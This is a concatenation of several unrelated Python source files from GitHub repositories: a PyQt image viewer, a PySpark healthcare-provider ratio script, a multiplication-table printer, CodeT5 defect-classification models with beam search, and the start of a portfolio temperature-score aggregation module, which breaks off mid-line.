    def __init__(self, parent=None):
        super().__init__(parent)
        self.is_loaded = None
        self.b_platform = None
        self.mat = None
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        self.view = ImageViewer(self)
        # Wire the menu actions to the viewer/open handlers.
        self.ui.actionOpen_file.triggered.connect(self.open)
        self.ui.actionZoom_in.triggered.connect(self.view.zoomIn)
        self.ui.actionZoom_out.triggered.connect(self.view.zoomOut)
        self.ui.actionNormal_view.triggered.connect(self.view.resetZoom)
    def get_self_ui(self):
        """Accessor used by ImageViewer and the modal windows."""
        return self.ui
    def open(self):
        """Show a file dialog, convert JPEGs to PNG, and load the image."""
        image_formats = " ".join(
            ["*." + image_format.data().decode() for image_format in QtGui.QImageReader.supportedImageFormats()]
        )
        print('open!!!')
        fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
            self,
            self.tr("Open Image"),
            QtCore.QDir.currentPath(),
            self.tr("Image Files({})".format(image_formats)),
        )
        self.show_statusbar_msm('Open file: ' + fileName)
        if fileName:
            if fileName.endswith('.jpg'):
                # Re-save JPEGs as PNG so downstream mat generation gets PNG input.
                im1 = Image.open(fileName)
                fileName = fileName[0:-3] + 'png'
                print(fileName)
                im1.save(fileName)
            self.mat = generate_mat_from_image(fileName)
            # print('self.mat.shape' + str(self.mat.shape))
            self.is_loaded = self.view.load_image(fileName)
            self.start_modal_windows()
            self.b_platform = BPlatform(self.mat)
            print('FINISH')
    # todo
    def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:
        # Escape resets the tool-button highlighting in the ModalM3 window.
        if self.is_loaded:
            if a0.key() == Qt.Key_Escape:
                print('Escape button')
                self.modal3.reset_all_button_color()
    def start_modal_windows(self):
        """Open the two auxiliary tool windows once an image is loaded."""
        if self.is_loaded:
            self.modal = ModalM2(self)
            self.modal.show()
            self.modal3 = ModalM3(self)
            self.modal3.show()
    def show_statusbar_msm(self, msm, sec=6000):
        self.ui.statusbar.showMessage(msm, sec)
    def update(self) -> None:
        # NOTE(review): this shadows QWidget.update and references
        # self.result_f_mat / self.img, neither of which is assigned anywhere
        # in this class — calling it as written raises AttributeError.
        height, width, channel = self.result_f_mat.shape
        bytesPerLine = 4 * width
        qImg = QImage(self.result_f_mat.data, width, height, bytesPerLine, QImage.Format_RGBA8888).rgbSwapped()
        pixmap = QPixmap(qImg)
        pixmap_scaled = pixmap.scaled(900, 1200)
        self.img.setPixmap(pixmap_scaled)
        self.img.move(5, 5)
class ModalM2(QtWidgets.QWidget):
    """Small tool window for editing the viewer's zoom factor."""
    def __init__(self, parent=BaseWin):
        super().__init__(parent, QtCore.Qt.Window)
        self.parent = parent
        self.modal = Ui_Form()
        self.modal.setupUi(self)
        self.def_start_val()
        self.modal.pushButton.clicked.connect(self.set_factor)
    def def_start_val(self):
        """Show the current zoom factor in the line edit."""
        self.parent.get_self_ui()
        self.modal.lineEdit.setText(str(self.parent.view.factor))
    def set_factor(self):
        """Apply the line-edit value as the viewer's new zoom factor."""
        self.parent.view.factor = float(self.modal.lineEdit.text())
        self.modal.lineEdit.setText(str(self.parent.view.factor))
        self.def_start_val()
class ModalM3(QtWidgets.QWidget):
    """Tool-palette window whose buttons toggle a pressed/unpressed state."""
    def __init__(self, parent=BaseWin):
        super().__init__(parent, QtCore.Qt.Window)
        self.base_window = parent
        self.modal = Ui_Form3()
        self.modal.setupUi(self)
        # Stylesheets used to highlight / reset the tool buttons.
        self.pressed_button_background_style = 'background-color: rgb(255, 255, 128);'
        self.unpressed_button_background_style = 'background-color: rgb(240, 240, 240);'
        self.pressed = None
        self.modal.pushButton.clicked.connect(self.pressed_butt_create_figure)
        self.modal.pushButton_3.clicked.connect(self.pressed_butt_foo)
    def pressed_butt_create_figure(self):
        """Highlight the 'create figure' button and record the pressed state."""
        self.modal.pushButton.setStyleSheet(self.pressed_button_background_style)
        self.pressed = True
        self.base_window.show_statusbar_msm('Pressed button: "create figure"', sec=0)
    def pressed_butt_foo(self):
        # Secondary button: only acts while a tool is pressed.
        if self.pressed:
            print('self.pressed')
            self.reset_all_button_color()
    def reset_all_button_color(self):
        """Return every tool button to the unpressed style."""
        if self.pressed:
            for button in self.modal.gridLayoutWidget.findChildren(QtWidgets.QPushButton):
                button.setStyleSheet(self.unpressed_button_background_style)
            self.pressed = False
if __name__ == '__main__':
    # Standard Qt application bootstrap.
    app = QtWidgets.QApplication(sys.argv)
    myapp = BaseWin()
    myapp.show()
    sys.exit(app.exec_())
| konstantinche36/b_platform | ui/ui_app_start.py | ui_app_start.py | py | 6,299 | python | en | code | 0 | github-code | 90 |
29719068716 | import re
import sys
from pyspark.sql.types import *
from pyspark.sql import SparkSession
from matplotlib import pyplot as plt
def main(argv,session):
    """Compute the seniors-per-provider ratio by state and provider type.

    argv: [provider_file, population_file, output_dir].
    NOTE(review): the SQL calls below use the global `spark` rather than the
    `session` parameter — works only because __main__ defines `spark`.
    """
    input_data = argv[0]
    pop_data= argv[1]
    out_data = argv[2]
    input_rdd = session.sparkContext.textFile(input_data)
    pop_rdd = session.sparkContext.textFile(pop_data)
    # Keep only GP/MHP providers in valid states.
    my_rdd = input_rdd.map(lambda line:parse(line)).filter(lambda line:filter_providers(line[1],line[2])).repartition(1)
    provider_schema = StructType([
        StructField("NPI",StringType(),False),
        StructField("ProviderType",StringType(),False),
        StructField("State",StringType(),False)
    ])
    provider_df = session.createDataFrame(my_rdd,schema=provider_schema)
    provider_df.createOrReplaceTempView("provider")
    # Senior population rows with purely numeric counts.
    my_population = pop_rdd.map(lambda line:parse_pop(line)).filter(lambda line:validate_senior_cnt(line[1])).repartition(1)
    senior_schema = StructType([
        StructField("State",StringType(),False),
        StructField("Population",StringType(),False)
    ])
    senior_df = session.createDataFrame(my_population,schema=senior_schema)
    senior_df.createOrReplaceTempView("senior")
    # Distinct providers per (state, type).
    provider_cnt = spark.sql("SELECT State,ProviderType,Count(Distinct NPI) AS P_cnt \
                FROM provider \
                GROUP BY State,ProviderType")
    provider_cnt.createOrReplaceTempView("state_PG")
    ratio_provider_senior = spark.sql("SELECT A.State, B.ProviderType, A.Population AS seniors, B.P_cnt AS providers, (A.Population / B.P_cnt) AS Ratio \
                FROM senior A, state_PG B \
                WHERE A.State = B.State \
                ORDER BY Ratio").repartition(1).persist()
    ratio_provider_senior.show()
    ratio_provider_senior.write.format('com.databricks.spark.csv').option("header","true").option("delimiter","\t").save(out_data)
    generate_boxplot(ratio_provider_senior.toPandas())
    return
def parse(line):
    """Parse a tab-separated provider row into (NPI, provider-group, STATE).

    Provider types are bucketed into "GP" (general practice), "MHP"
    (mental-health practitioner) or "else".
    """
    general_provider = ['FAMILY PRACTICE','PHYSICIAN ASSISTANT',
                        'NURSE PRACTITIONER','GENERAL PRACTICE',
                        'PREVENTIVE MEDICINE','GERIATRIC MEDICINE']
    mental_provider = ['PSYCHIATRY','CLINICAL PSYCHOLOGIST','GERIATRIC PSYCHIATRY',
                       'LICENSED CLINICAL SOCIAL WORKER','PSYCHOLOGIST (BILLING INDEPENDENTLY)',
                       'NEUROPSYCHIATRY','ADDICTION MEDICINE']
    tokens = line.split('\t')
    providerType = tokens[13].upper()
    # CONSISTENCY FIX: the original "else" branch kept the raw-case state while
    # the GP/MHP branches upper-cased it; now all branches agree.
    state = tokens[11].upper()
    if providerType in general_provider:
        group = "GP"
    elif providerType in mental_provider:
        group = "MHP"
    else:
        group = "else"
    return (tokens[0], group, state)
def filter_providers(ptype, state):
    """Keep only GP/MHP providers located in one of the 50 US states.

    Filters out bogus state codes (e.g. 'XX') in the source data. Uses a set
    for O(1) membership instead of the original list scan.
    """
    states = {'AL','AK','AZ','AR','CA','CO','CT','DE','FL','GA','HI','ID','IL',
              'IN','IA','KS','KY','LA','ME','MD','MA','MI','MN','MS','MO','MT',
              'NE','NV','NH','NJ','NM','NY','NC','ND','OH','OK','OR','PA','RI',
              'SC','SD','TN','TX','UT','VT','VA','WA','WV','WI','WY'}
    return ptype in ("GP", "MHP") and state in states
def parse_pop(line):
    """Parse a population row into (state, population-string).

    Quotes and thousands-separator commas are stripped from the count.
    """
    fields = line.split('\t')
    cleaned = fields[5].replace("\"","").replace(",","")
    return (fields[0], cleaned)
def validate_senior_cnt(token):
    """Return True only for strings consisting entirely of digits.

    BUG FIX: the original re.match with "^\\d+$" accepted a trailing newline
    ('$' matches before a final '\\n'); re.fullmatch does not.
    """
    return bool(re.fullmatch(r"\d+", token))
def generate_boxplot(given_df):
    """Show a boxplot of the seniors-per-provider Ratio grouped by ProviderType."""
    given_df.boxplot(column='Ratio', by='ProviderType',figsize=(5,5))
    plt.title("Ratio of Health Practitioners to Seniors by ProviderType")
    plt.xlabel("ProviderType")
    plt.ylabel("Ratio")
    # Clear pandas' automatic "Boxplot grouped by ..." super-title.
    plt.suptitle("")
    plt.show()
if __name__ == "__main__":
spark = SparkSession.builder \
.appName('validateCheckupsCount') \
.master("local")\
.getOrCreate()
main(sys.argv[1:],spark)
spark.stop() | dorisamo21/bigdata_labs | week12/provideratiosdf.py | provideratiosdf.py | py | 4,423 | python | en | code | 0 | github-code | 90 |
# Multiplication-table show() helper and its timing decorator.
def time_log(func):
    """Decorator that logs the wall-clock execution time of *func*."""
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's __name__/__doc__
    def wrapper(*args,**kwargs):
        import datetime
        start = datetime.datetime.today()
        print("\n---start:" + func.__name__)
        res = func(*args,**kwargs)
        end = datetime.datetime.today()
        delta = end - start
        print("\n---end:" + func.__name__,delta,"sec")
        return res
    return wrapper
@time_log
def show(first=1,end=9):
    """Print a multiplication table for the range [first, end], column-aligned."""
    column=[i for i in range(first,end+1)]
    table=[[i*j for i in range(first,end+1)] for j in range(first,end+1)]
    # Column widths are sized from the largest (bottom) row's entries.
    digit=[len(str(table[-1][i])) for i in range(len(column))]
    left=len(str(table[-1][0]))
    str_column="".join(" "*left + "  ")
    for x in zip(digit,column):
        str_column = str_column + "%*s"%x + " "
    # Horizontal separator matching the column widths.
    str_line="".join(" "*left + " +")
    for i in digit:
        str_line = str_line + "-"*i + "+"
    # Header row
    print(str_column)
    # Body rows
    for n in range(len(column)):
        print(str_line)
        print("%*d"%(left,column[n]),end=" |")
        for v in zip(digit,table[n]):
            print("%*d"%v,end="|")
        print("")
# Demo runs: default 1-9 table, 5-9 table, and 4-10 table.
show()
show(5)
show(4,10)
| 96no3/PythonStudy | Python/201910/191008/table_show01.py | table_show01.py | py | 1,309 | python | en | code | 0 | github-code | 90 |
24934941227 | import torch
import torch.nn as nn
import numpy as np
from transformers import (RobertaConfig, RobertaModel, RobertaTokenizer,
BartConfig, BartForConditionalGeneration, BartTokenizer,
T5Config, T5ForConditionalGeneration, T5Tokenizer)
import logging
from mmd import MMDLoss
logger = logging.getLogger(__name__)

# Maps a model-family key to its (config class, model class, tokenizer class).
MODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),
                 't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),
                 'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),
                 'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer)}
def get_model_size(model):
    """Return the trainable-parameter count of *model* in megaparameters, e.g. '60M'."""
    trainable = (p for p in model.parameters() if p.requires_grad)
    n_params = sum(int(np.prod(p.size())) for p in trainable)
    return "{}M".format(round(n_params / 1e+6))
# class GradientReversal(torch.autograd.Function):
#
# lambd = 1.0
# @staticmethod
# def forward(ctx, x):
# return x
#
# @staticmethod
# def backward(ctx, grad_output):
# return GradientReversal.lambd * grad_output.neg()
class ReverseLayerF(torch.autograd.Function):
    """Gradient-reversal layer: identity forward, gradients scaled by -alpha.

    Used for adversarial domain adaptation (DANN-style training).
    """

    @staticmethod
    def forward(ctx, x, alpha):
        # Remember the reversal strength for the backward pass.
        ctx.alpha = alpha
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        # Flip and scale the incoming gradient; None is the (non-existent)
        # gradient with respect to alpha.
        reversed_grad = grad_output.neg() * ctx.alpha
        return reversed_grad, None
class DefectModel1(nn.Module):
    """Adversarial domain classifier over CodeT5 encodings of 8 domains.

    forward() returns a weighted domain-classification loss (with gradient
    reversal) plus softmax weights for the 7 source domains derived from the
    target domain's (index 7) logits.
    """
    def __init__(self, encoder, config, tokenizer, args,**kwargs):
        super(DefectModel1, self).__init__()
        self.encoder = encoder
        self.config = config
        self.tokenizer = tokenizer
        # 8-way domain discriminator on the pooled encoder vector.
        self.domain_classifier = nn.Linear(config.hidden_size,8)
        self.args = args
        self.MMDLoss = MMDLoss(**kwargs)
    def get_t5_vec(self, source_ids):
        """Pool a batch of token ids to one vector per example.

        Uses the hidden state at the final <eos> position of the last decoder
        layer. Raises ValueError when examples disagree on <eos> count.
        """
        attention_mask = source_ids.ne(self.tokenizer.pad_token_id)
        outputs = self.encoder(input_ids=source_ids, attention_mask=attention_mask,
                               labels=source_ids, decoder_attention_mask=attention_mask, output_hidden_states=True)
        hidden_states = outputs['decoder_hidden_states'][-1]
        eos_mask = source_ids.eq(self.config.eos_token_id)
        if len(torch.unique(eos_mask.sum(1))) > 1:
            raise ValueError("All examples must have the same number of <eos> tokens.")
        vec = hidden_states[eos_mask, :].view(hidden_states.size(0), -1,
                                              hidden_states.size(-1))[:, -1, :]
        return vec
    def forward(self, ids=None,domain_labels=None,w_domain=None,lam=None):
        """Compute the (reversed-gradient) domain loss over 8 domain batches.

        Args:
            ids: sequence of 8 id tensors, one per domain (index 7 = target).
            domain_labels: per-domain label tensors for the discriminator.
            w_domain: per-domain scalar weights for the loss sum.
            lam: gradient-reversal strength passed to ReverseLayerF.
        Returns:
            (loss, weight) where weight are softmaxed source-domain weights
            taken from the first target example's logits.
        """
        loss_fct = nn.CrossEntropyLoss()
        new_id_0 = ids[0].view(-1, self.args.max_source_length)
        new_id_1 = ids[1].view(-1, self.args.max_source_length)
        new_id_2 = ids[2].view(-1, self.args.max_source_length)
        new_id_3 = ids[3].view(-1, self.args.max_source_length)
        new_id_4 = ids[4].view(-1, self.args.max_source_length)
        new_id_5 = ids[5].view(-1, self.args.max_source_length)
        new_id_6 = ids[6].view(-1, self.args.max_source_length)
        new_id_7 = ids[7].view(-1, self.args.max_source_length)
        #size(1,512)
        vec_0 = self.get_t5_vec(new_id_0)
        vec_1 = self.get_t5_vec(new_id_1)
        vec_2 = self.get_t5_vec(new_id_2)
        vec_3 = self.get_t5_vec(new_id_3)
        vec_4 = self.get_t5_vec(new_id_4)
        vec_5 = self.get_t5_vec(new_id_5)
        vec_6 = self.get_t5_vec(new_id_6)
        vec_7 = self.get_t5_vec(new_id_7)
        # Gradient reversal so the encoder learns domain-invariant features.
        vec_0 = ReverseLayerF.apply(vec_0,lam)
        vec_1 = ReverseLayerF.apply(vec_1,lam)
        vec_2 = ReverseLayerF.apply(vec_2,lam)
        vec_3 = ReverseLayerF.apply(vec_3,lam)
        vec_4 = ReverseLayerF.apply(vec_4,lam)
        vec_5 = ReverseLayerF.apply(vec_5,lam)
        vec_6 = ReverseLayerF.apply(vec_6,lam)
        vec_7 = ReverseLayerF.apply(vec_7,lam)
        domain_logit_0 = self.domain_classifier(vec_0)
        domain_logit_1 = self.domain_classifier(vec_1)
        domain_logit_2 = self.domain_classifier(vec_2)
        domain_logit_3 = self.domain_classifier(vec_3)
        domain_logit_4 = self.domain_classifier(vec_4)
        domain_logit_5 = self.domain_classifier(vec_5)
        domain_logit_6 = self.domain_classifier(vec_6)
        domain_logit_7 = self.domain_classifier(vec_7)
        # NOTE(review): softmax without an explicit dim= emits a deprecation
        # warning in modern torch; confirm dim=-1 is intended.
        domain_prob_7 = nn.functional.softmax(domain_logit_7)
        # Source-domain weights from the target batch's first example,
        # dropping the target's own class (last logit).
        weight = domain_prob_7[0][:-1]
        weight = nn.functional.softmax(weight)
        domain_cls_loss_0 = loss_fct(domain_logit_0, domain_labels[0])
        domain_cls_loss_1 = loss_fct(domain_logit_1, domain_labels[1])
        domain_cls_loss_2 = loss_fct(domain_logit_2, domain_labels[2])
        domain_cls_loss_3 = loss_fct(domain_logit_3, domain_labels[3])
        domain_cls_loss_4 = loss_fct(domain_logit_4, domain_labels[4])
        domain_cls_loss_5 = loss_fct(domain_logit_5, domain_labels[5])
        domain_cls_loss_6 = loss_fct(domain_logit_6, domain_labels[6])
        domain_cls_loss_7 = loss_fct(domain_logit_7, domain_labels[7])
        w_domain_cls_loss = w_domain[0]*domain_cls_loss_0 +w_domain[1]*domain_cls_loss_1 +w_domain[2]*domain_cls_loss_2 +w_domain[3]*domain_cls_loss_3 +w_domain[4]*domain_cls_loss_4 +w_domain[5]*domain_cls_loss_5 +w_domain[6]*domain_cls_loss_6 +w_domain[7]*domain_cls_loss_7
        # w_domain_cls_loss = domain_cls_loss_0+domain_cls_loss_1+domain_cls_loss_2 +domain_cls_loss_3 +domain_cls_loss_4 +domain_cls_loss_5 +domain_cls_loss_6 +domain_cls_loss_7
        # loss = 0.01*w_domain_cls_loss/8
        loss = 0.01*w_domain_cls_loss
        return loss,weight
class DefectModel2(nn.Module):
    def __init__(self, encoder, config, tokenizer, args,**kwargs):
        """Wrap *encoder* with a 44-way defect classifier and an MMD loss."""
        super(DefectModel2, self).__init__()
        self.encoder = encoder
        self.config = config
        self.tokenizer = tokenizer
        # Task head: 44 defect classes over the pooled encoder vector.
        self.classifier = nn.Linear(config.hidden_size, 44)
        self.args = args
        self.MMDLoss = MMDLoss(**kwargs)
    def get_t5_vec(self, source_ids):
        """Pool a batch of token ids to one vector per example.

        Identical to DefectModel1.get_t5_vec: the hidden state at the final
        <eos> position of the last decoder layer; raises ValueError when
        examples disagree on <eos> count.
        """
        attention_mask = source_ids.ne(self.tokenizer.pad_token_id)
        outputs = self.encoder(input_ids=source_ids, attention_mask=attention_mask,
                               labels=source_ids, decoder_attention_mask=attention_mask, output_hidden_states=True)
        hidden_states = outputs['decoder_hidden_states'][-1]
        eos_mask = source_ids.eq(self.config.eos_token_id)
        if len(torch.unique(eos_mask.sum(1))) > 1:
            raise ValueError("All examples must have the same number of <eos> tokens.")
        vec = hidden_states[eos_mask, :].view(hidden_states.size(0), -1,
                                              hidden_states.size(-1))[:, -1, :]
        return vec
def forward(self, ids=None, labels = None,train=True,w=None):
loss_fct = nn.CrossEntropyLoss()
if train:
new_id_0 = ids[0].view(-1, self.args.max_source_length)
new_id_1 = ids[1].view(-1, self.args.max_source_length)
new_id_2 = ids[2].view(-1, self.args.max_source_length)
new_id_3 = ids[3].view(-1, self.args.max_source_length)
new_id_4 = ids[4].view(-1, self.args.max_source_length)
new_id_5 = ids[5].view(-1, self.args.max_source_length)
new_id_6 = ids[6].view(-1, self.args.max_source_length)
new_id_7 = ids[7].view(-1, self.args.max_source_length)
vec_0 = self.get_t5_vec(new_id_0)
vec_1 = self.get_t5_vec(new_id_1)
vec_2 = self.get_t5_vec(new_id_2)
vec_3 = self.get_t5_vec(new_id_3)
vec_4 = self.get_t5_vec(new_id_4)
vec_5 = self.get_t5_vec(new_id_5)
vec_6 = self.get_t5_vec(new_id_6)
vec_7 = self.get_t5_vec(new_id_7)
logit_0 = self.classifier(vec_0)
logit_1 = self.classifier(vec_1)
logit_2 = self.classifier(vec_2)
logit_3 = self.classifier(vec_3)
logit_4 = self.classifier(vec_4)
logit_5 = self.classifier(vec_5)
logit_6 = self.classifier(vec_6)
logit_7 = self.classifier(vec_7)
dis_loss_0 = self.MMDLoss(vec_0, vec_7)
dis_loss_1 = self.MMDLoss(vec_1, vec_7)
dis_loss_2 = self.MMDLoss(vec_2, vec_7)
dis_loss_3 = self.MMDLoss(vec_3, vec_7)
dis_loss_4 = self.MMDLoss(vec_4, vec_7)
dis_loss_5 = self.MMDLoss(vec_5, vec_7)
dis_loss_6 = self.MMDLoss(vec_6, vec_7)
cls_loss_0 = loss_fct(logit_0, labels[0])
cls_loss_1 = loss_fct(logit_1, labels[1])
cls_loss_2 = loss_fct(logit_2, labels[2])
cls_loss_3 = loss_fct(logit_3, labels[3])
cls_loss_4 = loss_fct(logit_4, labels[4])
cls_loss_5 = loss_fct(logit_5, labels[5])
cls_loss_6 = loss_fct(logit_6, labels[6])
w_dis_loss = w[0].item()*dis_loss_0 + w[1].item()*dis_loss_1 +w[2].item()*dis_loss_2 +w[3].item()*dis_loss_3 +w[4].item()*dis_loss_4 +w[5].item()*dis_loss_5 +w[6].item()*dis_loss_6
#w_dis_loss = dis_loss_0 + dis_loss_1 +dis_loss_2 +dis_loss_3 +dis_loss_4 +dis_loss_5 +dis_loss_6
w_cls_loss = cls_loss_0 + cls_loss_1 +cls_loss_2 +cls_loss_3 +cls_loss_4 +cls_loss_5 +cls_loss_6
loss = 0.015*w_dis_loss + w_cls_loss/7
return loss
else:
source_ids = ids.view(-1, self.args.max_source_length)
vec = self.get_t5_vec(source_ids)
logits = self.classifier(vec)
prob = nn.functional.softmax(logits)
loss = loss_fct(logits, labels)
return loss, prob,vec
class Beam(object):
    """Beam-search bookkeeping for a single example: per-beam scores,
    backpointers, emitted tokens and finished hypotheses."""

    def __init__(self, size, sos, eos):
        self.size = size
        # NOTE(review): hard-codes CUDA tensor constructors; this class cannot
        # run on a CPU-only machine as written.
        self.tt = torch.cuda
        # The score for each translation on the beam.
        self.scores = self.tt.FloatTensor(size).zero_()
        # The backpointers at each time-step.
        self.prevKs = []
        # The outputs at each time-step.
        self.nextYs = [self.tt.LongTensor(size)
                       .fill_(0)]
        self.nextYs[0][0] = sos
        # Has EOS topped the beam yet.
        self._eos = eos
        self.eosTop = False
        # Time and k pair for finished.
        self.finished = []

    def getCurrentState(self):
        "Get the outputs for the current timestep."
        batch = self.tt.LongTensor(self.nextYs[-1]).view(-1, 1)
        return batch

    def getCurrentOrigin(self):
        "Get the backpointers for the current timestep."
        return self.prevKs[-1]

    def advance(self, wordLk):
        """
        Given prob over words for every last beam `wordLk` and attention
        `attnOut`: Compute and update the beam search.
        Parameters:
        * `wordLk`- probs of advancing from the last step (K x words)
        * `attnOut`- attention at the last step
        Returns: True if beam search is complete.
        """
        numWords = wordLk.size(1)
        # Sum the previous scores.
        if len(self.prevKs) > 0:
            beamLk = wordLk + self.scores.unsqueeze(1).expand_as(wordLk)
            # Don't let EOS have children.
            for i in range(self.nextYs[-1].size(0)):
                if self.nextYs[-1][i] == self._eos:
                    beamLk[i] = -1e20
        else:
            # First step: all beams are identical, so only row 0 matters.
            beamLk = wordLk[0]
        flatBeamLk = beamLk.view(-1)
        bestScores, bestScoresId = flatBeamLk.topk(self.size, 0, True, True)
        self.scores = bestScores
        # bestScoresId is flattened beam x word array, so calculate which
        # word and beam each score came from
        prevK = bestScoresId // numWords
        self.prevKs.append(prevK)
        self.nextYs.append((bestScoresId - prevK * numWords))
        # Record hypotheses that just emitted EOS as finished (score, step, beam).
        for i in range(self.nextYs[-1].size(0)):
            if self.nextYs[-1][i] == self._eos:
                s = self.scores[i]
                self.finished.append((s, len(self.nextYs) - 1, i))
        # End condition is when top-of-beam is EOS and no global score.
        if self.nextYs[-1][0] == self._eos:
            self.eosTop = True

    def done(self):
        # Complete once EOS leads the beam and enough hypotheses have finished.
        return self.eosTop and len(self.finished) >= self.size

    def getFinal(self):
        # Return the best `size` finished hypotheses, sorted by score
        # (descending), padding with the best still-unfinished beams if fewer
        # than `size` have emitted EOS.
        if len(self.finished) == 0:
            self.finished.append((self.scores[0], len(self.nextYs) - 1, 0))
        self.finished.sort(key=lambda a: -a[0])
        if len(self.finished) != self.size:
            unfinished = []
            for i in range(self.nextYs[-1].size(0)):
                if self.nextYs[-1][i] != self._eos:
                    s = self.scores[i]
                    unfinished.append((s, len(self.nextYs) - 1, i))
            unfinished.sort(key=lambda a: -a[0])
            self.finished += unfinished[:self.size - len(self.finished)]
        return self.finished[:self.size]

    def getHyp(self, beam_res):
        """
        Walk back to construct the full hypothesis.
        """
        hyps = []
        for _, timestep, k in beam_res:
            hyp = []
            # Follow backpointers from `timestep` back to the start token.
            for j in range(len(self.prevKs[:timestep]) - 1, -1, -1):
                hyp.append(self.nextYs[j + 1][k])
                k = self.prevKs[j][k]
            hyps.append(hyp[::-1])
        return hyps

    def buildTargetTokens(self, preds):
        # Truncate each hypothesis at its first EOS token.
        sentence = []
        for pred in preds:
            tokens = []
            for tok in pred:
                if tok == self._eos:
                    break
                tokens.append(tok)
            sentence.append(tokens)
        return sentence
| starve123456/copilot | copilot/models.py | models.py | py | 13,544 | python | en | code | 0 | github-code | 90 |
15427394462 | from abc import ABC
from enum import Enum
import warnings # needed until apply behaves better with Pint quantities in arrays
from typing import Type
from pint import Quantity
from pint_pandas import PintArray
import pandas as pd
import pint
import pint_pandas
ureg = pint.get_application_registry()
Q_ = ureg.Quantity
PA_ = pint_pandas.PintArray
from .configs import PortfolioAggregationConfig, ColumnsConfig
from .interfaces import EScope
class PortfolioAggregationMethod(Enum):
    """
    The portfolio aggregation method determines how the temperature scores for
    the individual companies are aggregated into a single portfolio score.
    """
    WATS = 'WATS'
    TETS = 'TETS'
    MOTS = 'MOTS'
    EOTS = 'EOTS'
    ECOTS = 'ECOTS'
    AOTS = 'AOTS'
    ROTS = 'ROTS'

    @staticmethod
    def is_emissions_based(method: 'PortfolioAggregationMethod') -> bool:
        """
        Check whether a given method is emissions-based (i.e. it uses the
        emissions to calculate the aggregation).
        :param method: The method to check
        :return: True for the owned-emissions family of methods
        """
        emissions_based = (PortfolioAggregationMethod.MOTS,
                           PortfolioAggregationMethod.EOTS,
                           PortfolioAggregationMethod.ECOTS,
                           PortfolioAggregationMethod.AOTS,
                           PortfolioAggregationMethod.ROTS)
        return method in emissions_based

    @staticmethod
    def get_value_column(method: 'PortfolioAggregationMethod', column_config: Type[ColumnsConfig]) -> str:
        """Return the company-valuation column used by an emissions-based
        method, falling back to market cap for every other method."""
        if method is PortfolioAggregationMethod.EOTS:
            return column_config.COMPANY_ENTERPRISE_VALUE
        if method is PortfolioAggregationMethod.ECOTS:
            return column_config.COMPANY_EV_PLUS_CASH
        if method is PortfolioAggregationMethod.AOTS:
            return column_config.COMPANY_TOTAL_ASSETS
        if method is PortfolioAggregationMethod.ROTS:
            return column_config.COMPANY_REVENUE
        # MOTS and the non-emissions methods (WATS/TETS) use market cap.
        return column_config.COMPANY_MARKET_CAP
class PortfolioAggregation(ABC):
    """
    This class is a base class that provides portfolio aggregation calculation.
    :param config: A class defining the constants that are used throughout this class. This parameter is only required
                   if you'd like to overwrite a constant. This can be done by extending the PortfolioAggregationConfig
                   class and overwriting one of the parameters.
    """

    def __init__(self, config: Type[PortfolioAggregationConfig] = PortfolioAggregationConfig):
        self.c = config

    def _check_column(self, data: pd.DataFrame, column: str):
        """
        Check if a certain column is filled for all companies. If not throw an error.
        :param data: The data to check
        :param column: The column to check
        :return:
        """
        missing_data = data[pd.isnull(data[column])][self.c.COLS.COMPANY_NAME].unique()
        if len(missing_data):
            raise ValueError("The value for {} is missing for the following companies: {}".format(
                column, ", ".join(missing_data)
            ))

    def _calculate_aggregate_score(self, data: pd.DataFrame, input_column: str,
                                   portfolio_aggregation_method: PortfolioAggregationMethod) -> pd.Series:
        """
        Aggregate the scores in a given column based on a certain portfolio aggregation method.
        :param data: The data to run the calculations on
        :param input_column: The input column (containing the scores)
        :param portfolio_aggregation_method: The method to use
        :return: The aggregates score as a pd.Series
        """
        # Weighted average temperature score (WATS): weight by investment value.
        if portfolio_aggregation_method == PortfolioAggregationMethod.WATS:
            total_investment_weight = data[self.c.COLS.INVESTMENT_VALUE].sum()
            try:
                with warnings.catch_warnings():
                    warnings.simplefilter("ignore")
                    # See https://github.com/hgrecco/pint-pandas/issues/114
                    weights_series = pd.Series(data.apply(
                        lambda row: row[self.c.COLS.INVESTMENT_VALUE] * row[input_column] / total_investment_weight,
                        axis=1))
                return weights_series
            except ZeroDivisionError:
                raise ValueError("The portfolio weight is not allowed to be zero")
        # Total emissions weighted temperature score (TETS)
        elif portfolio_aggregation_method == PortfolioAggregationMethod.TETS:
            # Which rows contribute scope-1+2 and which contribute scope-3 emissions.
            use_S1S2 = data[self.c.COLS.SCOPE].isin([EScope.S1S2, EScope.S1S2S3])
            use_S3 = data[self.c.COLS.SCOPE].isin([EScope.S3, EScope.S1S2S3])
            if use_S3.any():
                self._check_column(data, self.c.COLS.GHG_SCOPE3)
            if use_S1S2.any():
                self._check_column(data, self.c.COLS.GHG_SCOPE12)
            # Calculate the total emissions of all companies
            emissions = data.loc[use_S1S2, self.c.COLS.GHG_SCOPE12].sum() + data.loc[use_S3, self.c.COLS.GHG_SCOPE3].sum()
            try:
                # Each company's score weighted by its share of the total emissions.
                weights_series = pd.Series((data[self.c.COLS.GHG_SCOPE12].where(use_S1S2, 0) + data[self.c.COLS.GHG_SCOPE3].where(use_S3, 0)) \
                                           / emissions * data[input_column])
                return weights_series
            except ZeroDivisionError:
                raise ValueError("The total emissions should be higher than zero")
        elif PortfolioAggregationMethod.is_emissions_based(portfolio_aggregation_method):
            # These four methods only differ in the way the company is valued.
            value_column = PortfolioAggregationMethod.get_value_column(portfolio_aggregation_method, self.c.COLS)
            # Calculate the total owned emissions of all companies
            try:
                self._check_column(data, self.c.COLS.INVESTMENT_VALUE)
                self._check_column(data, value_column)
                use_S1S2 = data[self.c.COLS.SCOPE].isin([EScope.S1S2, EScope.S1S2S3])
                use_S3 = data[self.c.COLS.SCOPE].isin([EScope.S3, EScope.S1S2S3])
                if use_S1S2.any():
                    self._check_column(data, self.c.COLS.GHG_SCOPE12)
                if use_S3.any():
                    self._check_column(data, self.c.COLS.GHG_SCOPE3)
                # Owned emissions = ownership fraction (investment / company value)
                # times the company's in-scope emissions.
                data[self.c.COLS.OWNED_EMISSIONS] = (data[self.c.COLS.INVESTMENT_VALUE] / data[value_column]) * (
